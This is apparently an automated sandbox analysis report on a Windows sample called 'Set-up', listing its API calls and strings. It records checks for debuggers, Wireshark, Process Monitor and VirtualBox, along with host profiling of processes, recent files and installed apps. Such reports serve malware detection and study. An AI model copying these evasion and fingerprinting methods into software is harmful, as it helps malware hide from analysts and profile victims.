                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112C5F
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00112CC4
                                • Process32First.KERNEL32 ref: 00112CDF
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112D0D
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D42
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D5C
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D76
                                • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00112D90
                                • Process32Next.KERNEL32 ref: 00112DBF
                                • CloseHandle.KERNELBASE ref: 00112DFC
                                • EnumWindows.USER32 ref: 00112E21
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                                • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                                • API String ID: 515599682-3783588604
                                • Opcode ID: 2b4b5761632dfe4541ac109840bfd6b0aa3be63e1efa4254db289fdb77881e54
                                • Instruction ID: 8cf236fb786fd0ac13e1c78a0b722c9e0693b591bc96ada25b54c0bd5a0fcad2
                                • Opcode Fuzzy Hash: 2b4b5761632dfe4541ac109840bfd6b0aa3be63e1efa4254db289fdb77881e54
                                • Instruction Fuzzy Hash: 6CE106B49053199FCB50EF69D98469EBBF5AF44304F01887DE888D7350EB789A94CF82

                                Control-flow Graph

                                APIs
                                • GetSystemInfo.KERNELBASE ref: 00112579
                                  • Part of subcall function 00633B30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00112589), ref: 00633B45
                                • GlobalMemoryStatusEx.KERNELBASE ref: 001125CC
                                • GetLogicalDriveStringsA.KERNEL32 ref: 00112619
                                • GetDriveTypeA.KERNELBASE ref: 00112647
                                • GetDiskFreeSpaceExA.KERNELBASE ref: 0011267E
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00112749
                                • KiUserCallbackDispatcher.NTDLL ref: 001127E2
                                • SHGetKnownFolderPath.SHELL32 ref: 0011286D
                                • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001128BE
                                • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001128D4
                                • FindFirstFileW.KERNELBASE ref: 001128F8
                                • FindNextFileW.KERNELBASE ref: 0011291F
                                • K32EnumProcesses.KERNEL32 ref: 0011296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                                • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                                • API String ID: 2116500361-3337672980
                                • Opcode ID: cf7dfb80c860bf3b56cf498f3a3c112a6f33dd3298848491b4a567b6836ee234
                                • Instruction ID: 152b327624e8787f3da1e82180d341885958719cbd5dd33a663f866e685147a4
                                • Opcode Fuzzy Hash: cf7dfb80c860bf3b56cf498f3a3c112a6f33dd3298848491b4a567b6836ee234
                                • Instruction Fuzzy Hash: 17D1C2B49053199FCB40EFA8C98569EBBF1BF48314F00896DE898D7351E7349A84CF96

                                Control-flow Graph

                                APIs
                                • htons.WS2_32(?), ref: 001DAAE8
                                • htons.WS2_32(?), ref: 001DAB33
                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 001DAB9A
                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 001DABE3
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 001DAC02
                                • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 001DAC29
                                • htonl.WS2_32(00000000), ref: 001DAC69
                                • bind.WS2_32(?,00000017,0000001C), ref: 001DACCF
                                • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 001DACFE
                                • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 001DAD20
                                • WSAGetLastError.WS2_32 ref: 001DADB5
                                • closesocket.WS2_32(?), ref: 001DAE6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                                • String ID: xc
                                • API String ID: 4039825230-3394131015
                                • Opcode ID: f4bcb7a7a769916bcfb78a514290840c03dbafa83d1635a2c4bce307e84d0625
                                • Instruction ID: 3ff9b0120c4d5c5bc426a0e93e131ae7ae67403293c3cc488bddf680d990b15b
                                • Opcode Fuzzy Hash: f4bcb7a7a769916bcfb78a514290840c03dbafa83d1635a2c4bce307e84d0625
                                • Instruction Fuzzy Hash: F5E18C706003019FEB20CF64C885B6AB7E5FF89314F548A2EF9998B391D775E944CB92

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • GetStartupInfoA.KERNEL32 ref: 00111433
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 3873122205-0
                                • Opcode ID: 865d4c6faaa7032333a3aa774f05668fb454bacba1dfd548038345e06fa2814c
                                • Instruction ID: cf85b504e050a13b4ac5abb9beafe130770f087e725294097fac90361bce2fee
                                • Opcode Fuzzy Hash: 865d4c6faaa7032333a3aa774f05668fb454bacba1dfd548038345e06fa2814c
                                • Instruction Fuzzy Hash: DD81AC71A04304DFDB18DFA9E9813AEFBE0FB95304F11493DDA859B251E775A884CB82

                                Control-flow Graph

                                APIs
                                • _open.MSVCRT ref: 00498EAD
                                • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00498EFA
                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00498F4A
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00498F59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _close_exit_open_write
                                • String ID: terminated$@$CONOUT$
                                • API String ID: 28676597-491099378
                                • Opcode ID: 724e1bda4e12c7339c22535c37228dd41d09525da927d1749e7ae0ae0055068b
                                • Instruction ID: 7f268042a5c33c96cc2992ac1159d1bcd15090cb02d29eee8312b32671ddb856
                                • Opcode Fuzzy Hash: 724e1bda4e12c7339c22535c37228dd41d09525da927d1749e7ae0ae0055068b
                                • Instruction Fuzzy Hash: 38412AB09042058FCB00DF79D94566EBBE5FB99314F008A2EE998D7391E738D845CB56

                                Control-flow Graph

                                Strings
                                • error CryptGenRandom 0x%08lx, xrefs: 006319E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: error CryptGenRandom 0x%08lx
                                • API String ID: 0-1222942552
                                • Opcode ID: 3776a68ac30b68eb85caf028b603b613e8f079d5a89ddcb1f3f886cf6a900507
                                • Instruction ID: 749c8c319ad250074aa702bc5f4fc7fcd489f4aa631279358c548249ad0e7edd
                                • Opcode Fuzzy Hash: 3776a68ac30b68eb85caf028b603b613e8f079d5a89ddcb1f3f886cf6a900507
                                • Instruction Fuzzy Hash: E141C1B59093009FC700EF79D58961EBFE0BB99314F409E2EE98887354E7789548CF86

                                Control-flow Graph

                                APIs
                                • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00120711
                                • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00120783
                                • WSAWaitForMultipleEvents.WS2_32(00000001,00113EBE,00000000,00000000,00000000), ref: 0012086F
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001208EF
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00120934
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001209DC
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001209FB
                                • WSAResetEvent.WS2_32(8508C483), ref: 00120A1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                                • String ID: multi.c
                                • API String ID: 3264668090-214371023
                                • Opcode ID: c4a27ee146f77e481594471f1661de2f31f933f1ef6660a4014e861f92e3bed5
                                • Instruction ID: 73e49d3e08d940a2209ab929147ac6ce80da55b796efec15e312668ea040a2e5
                                • Opcode Fuzzy Hash: c4a27ee146f77e481594471f1661de2f31f933f1ef6660a4014e861f92e3bed5
                                • Instruction Fuzzy Hash: 58D1C2756083019FEB12CF64E881BAB77E5FF98348F044A2CF98587252E774E964CB52
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: e0f12921f182211ca395403b1fca3bfd7fed9e53789522e958dedd563b35ac9a
                                • Instruction ID: 836c854fd14a4e6b655b9b6181d341bdf9ac653adb0a3df6c976f6ab5b274fa1
                                • Opcode Fuzzy Hash: e0f12921f182211ca395403b1fca3bfd7fed9e53789522e958dedd563b35ac9a
                                • Instruction Fuzzy Hash: 5991253060C3298BD7358B69E8947BBB2E5FFC5324F148B2CE899831D4EB749C60D681
                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011140C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 1209083157-0
                                • Opcode ID: fbd6c2fc7c26e32e642bbea6a85009227066b130a7e708fb5c375db96abe4a0d
                                • Instruction ID: 12da2456aae143a9d46641d45126afdf607daf26385d433b9ab0ccc3f61ab541
                                • Opcode Fuzzy Hash: fbd6c2fc7c26e32e642bbea6a85009227066b130a7e708fb5c375db96abe4a0d
                                • Instruction Fuzzy Hash: F2416BB0A04741DFDB18EFA9E99439DBBF0BB99344F10493DE944A7350DB749884CB92
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                  • Part of subcall function 00498A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,001113EF), ref: 00498A2A
                                • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011140C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 2715571461-0
                                • Opcode ID: d2f0c65ffccac2e7b750ffa9f097b61429d2cb28b043970ec7c32e888e1ac835
                                • Instruction ID: a58a3fd9a06267df398758df35d859248dd533b7c050d80e4f164c9bc79f69da
                                • Opcode Fuzzy Hash: d2f0c65ffccac2e7b750ffa9f097b61429d2cb28b043970ec7c32e888e1ac835
                                • Instruction Fuzzy Hash: 8F4138B0904705DFDB18EFA9D99139DBBF0BB95304F10493EEA84A7351DB749884CB42
                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • GetStartupInfoA.KERNEL32 ref: 00111433
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 3873122205-0
                                • Opcode ID: 7a4b9b5e04021e9b9678ac9fa90e740cd7538000f1f1fb20b3051b5596eb9fae
                                • Instruction ID: 0ec53d7942ee44b8d2d97434bd5a2cb3fe622b5b211ecb8c8fe6729929e097fb
                                • Opcode Fuzzy Hash: 7a4b9b5e04021e9b9678ac9fa90e740cd7538000f1f1fb20b3051b5596eb9fae
                                • Instruction Fuzzy Hash: 4A516A71A04744DFDB18DFA9D99079ABBF0FB99304F10493DEA44AB361D734A880CB82
                                APIs
                                • recv.WS2_32(000000FF,001C6F4E,000000FF,00000000), ref: 001DA8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: f69e1454384c90c5c029fc5825064191f0af40c3c4743f0fe6da407a71d01b31
                                • Instruction ID: 10de9f3cbf1400d8d0e708565dfda7b4ecd833c38b8d4eb3a74803c1296f331c
                                • Opcode Fuzzy Hash: f69e1454384c90c5c029fc5825064191f0af40c3c4743f0fe6da407a71d01b31
                                • Instruction Fuzzy Hash: AFF01C72B047206BD624CA18EC05F9BF369EBC4B21F148909B954673488370BC118BE2
                                APIs
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA499
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA4FB
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 001CA531
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 001CAA19
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CAA4C
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 001CAA97
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 001CAAE9
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 001CAB30
                                • RegCloseKey.KERNELBASE(?), ref: 001CAB6A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 001CAB82
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CABAD
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CABF0
                                • RegCloseKey.ADVAPI32(?), ref: 001CAC2A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 001CAC46
                                • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 001CAC71
                                • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 001CACB4
                                • RegCloseKey.ADVAPI32(?), ref: 001CACEE
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 001CAD0A
                                • RegEnumKeyExA.KERNELBASE ref: 001CAD8D
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CADB0
                                • RegCloseKey.KERNELBASE(?), ref: 001CADD9
                                • RegEnumKeyExA.KERNELBASE ref: 001CAE08
                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 001CAE2A
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 001CAE54
                                • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 001CAEA3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001CAF18
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CAF2C
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 001CAF63
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 001CAFB2
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001CB027
                                • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 001CB03B
                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 001CB072
                                • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 001CB0C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u$xc$|c
                                • API String ID: 1856363200-2353712586
                                • Opcode ID: 0521b5f127a404f870911884453399642ca1a464d4bf958dca326cca2b1ec62b
                                • Instruction ID: 92dd3500b53814545fda7b1bf8569e967683622ebead8246dc2d3ca3427b98ee
                                • Opcode Fuzzy Hash: 0521b5f127a404f870911884453399642ca1a464d4bf958dca326cca2b1ec62b
                                • Instruction Fuzzy Hash: C782ADB1608305AFE3218B24DC86F6B7BE8EF95704F54482CF985D72A1E774E944CB92

                                Control-flow Graph

                                APIs
                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 001D978D
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 001D97BA
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001D97E4
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001D98A5
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 001D9920
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 001D9946
                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 001D9974
                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 001D9981
                                • RegCloseKey.ADVAPI32(?), ref: 001D998B
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D9992
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001D97FE
                                  • Part of subcall function 001D78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,001DE16D,?), ref: 001D78AF
                                  • Part of subcall function 001D78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 001D78D9
                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 001D9C46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                • API String ID: 3843116398-615551945
                                • Opcode ID: 0c073fd3130010853fce49965007dcca5be45d4ee07ed466c8a54d52f7a18299
                                • Instruction ID: 727cae553831320607397427897ce4d3f91662d673bd152ffdc36fcc6c154229
                                • Opcode Fuzzy Hash: 0c073fd3130010853fce49965007dcca5be45d4ee07ed466c8a54d52f7a18299
                                • Instruction Fuzzy Hash: A13272B6904201ABEB11AB24EC42F2B77E9AF64318F084439F94996363F731ED15D793

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: EnumOpen
                                • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                                • API String ID: 3231578192-3120786300
                                • Opcode ID: d0f2ef00edcaabdc9ce51ce5068507efc8c3ecdd7c5ae3eecd98e6d99423a65b
                                • Instruction ID: 4f134a46c79b6275487f9f11f39a2e60a70f0c8f604ae6901bdaeea7439f5986
                                • Opcode Fuzzy Hash: d0f2ef00edcaabdc9ce51ce5068507efc8c3ecdd7c5ae3eecd98e6d99423a65b
                                • Instruction Fuzzy Hash: 4471A4B4904319DFDB50DF69D98479EBBF0BF84308F10886DE99897341E7749A888F92

                                Control-flow Graph

                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE5E2
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE5FA
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 002EE637
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0027A31E), ref: 002EE64D
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0027A31E,00000001,?,00000008,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000), ref: 002EE665
                                • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE678
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE685
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE690
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E), ref: 002EE6A6
                                • GetLastError.KERNEL32(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6B0
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE6CC
                                • GetLastError.KERNEL32(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6E2
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE6FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                                • String ID:
                                • API String ID: 2867842857-0
                                • Opcode ID: fb6ce71668cc4e0553679f4ddb62e0cf49097eeb4cc5e79673ab897da9c38489
                                • Instruction ID: b282dfa84373bab4bbe6272d70b1a88efde71282803e50b3b0a3bc76e57046e5
                                • Opcode Fuzzy Hash: fb6ce71668cc4e0553679f4ddb62e0cf49097eeb4cc5e79673ab897da9c38489
                                • Instruction Fuzzy Hash: 1731C279260241BBEF206F76DC49F6B3B69FB45715F148538FA12C92D0EB309910CB61

                                Control-flow Graph

                                APIs
                                • connect.WS2_32(?,?,00000001), ref: 00148C2F
                                • WSAGetLastError.WS2_32 ref: 00148C39
                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00148CF3
                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00148D0E
                                • WSAGetLastError.WS2_32 ref: 00148D18
                                • WSASetLastError.WS2_32(00000000), ref: 00148E0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$Sleepconnectgetsockopt
                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                • API String ID: 2513251565-879669977
